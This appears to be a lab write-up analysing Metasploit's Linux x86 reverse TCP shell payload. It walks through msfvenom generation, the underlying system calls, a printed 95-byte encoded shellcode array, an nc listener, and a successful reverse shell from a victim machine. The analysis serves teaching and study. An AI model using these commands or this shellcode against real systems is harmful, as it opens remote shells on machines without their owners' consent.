linux/x86/shell_reverse_tcp Analyzing
I will analyze this shellcode from msfvenom
, and I will keep it simple.
0x4553@kali:~# msfvenom -l payloads | grep linux/x86
...
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
...
Keep in mind, that shellcodes use system calls. To interrupt a system call we use instruction
int 0x80
, and the skeleton will be something like this:
EAX <-- System Call Number [it will contain the return value]
EBX <-- 1st arg
ECX <-- 2nd arg
EDX <-- 3rd arg
int 0x80 <-- interrupt
linux/x86/shell_reverse_tcp
Description: Connect back to the attacker and spawn a command shell.
To show the shellcode’s options:
0x4553@kali:~# msfvenom -p linux/x86/shell_reverse_tcp --list-options
Options for payload/linux/x86/shell_reverse_tcp:
=========================
...
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST yes The listen address
LPORT 4444 yes The listen port
...
The shellcode will execute CMD
and send output to LHOST
at LPORT
Let’s create the shellcode and only specify LHOST
to leave other options like the default:
0x4553@kali:~# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.149.142 -f raw > reverse_tcp_raw
-p: is the payload we want to use.
LHOST: the address to connect back to it.
-f: shellcode format, I choose raw to analyze it first.
- Let’s statically analyze the shellcode using ndisasm:
0x4553@kali:~# cat reverse_tcp_raw| ndisasm -u -
-u: Specifies 32-bit mode.
Analyzing the instructions
TL;DR
This shellcode interrupts four system calls:
- socketcall: used to create a socket using
socket
function call. - dup2: used to redirect stdin, stdout, and stderr from victim to attacker and vice versa.
- socketcall: used to connect to
LHOST
atLPORT
usingconnect
function call. - execve: used to execute process specified by
CMD
.
Let’s generate shellcode without null bytes.
0x4553@kali:~# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.149.142 -b "\x00" -f c -v shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 431 bytes
unsigned char shellcode[] =
"\xd9\xe8\xb8\x5f\x92\xed\x97\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x12\x83\xc6\x04\x31\x46\x13\x03\x19\x81\x0f\x62\x94\x7e\x38"
"\x6e\x85\xc3\x94\x1b\x2b\x4d\xfb\x6c\x4d\x80\x7c\x1f\xc8\xaa"
"\x42\xed\x6a\x83\xc5\x14\x02\xd4\x9e\x72\x5c\xbc\xdc\x7c\x71"
"\x61\x68\x9d\xc1\xff\x3a\x0f\x72\xb3\xb8\x26\x95\x7e\x3e\x6a"
"\x3d\xef\x10\xf8\xd5\x87\x41\xd1\x47\x31\x17\xce\xd5\x92\xae"
"\xf0\x69\x1f\x7c\x72";
And place it in shellcode.c:
Open a listener in attacker:
0x4553@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
Compile and run in victim:
elham@ubuntu:~$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
elham@ubuntu:~$ ./shellcode
Shellcode Length: 95
We got a reverse shell from victim to the attacker:
0x4553@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.149.142] from (UNKNOWN) [192.168.149.140] 53858
whoami
elham
I hope you will find this article useful ❤.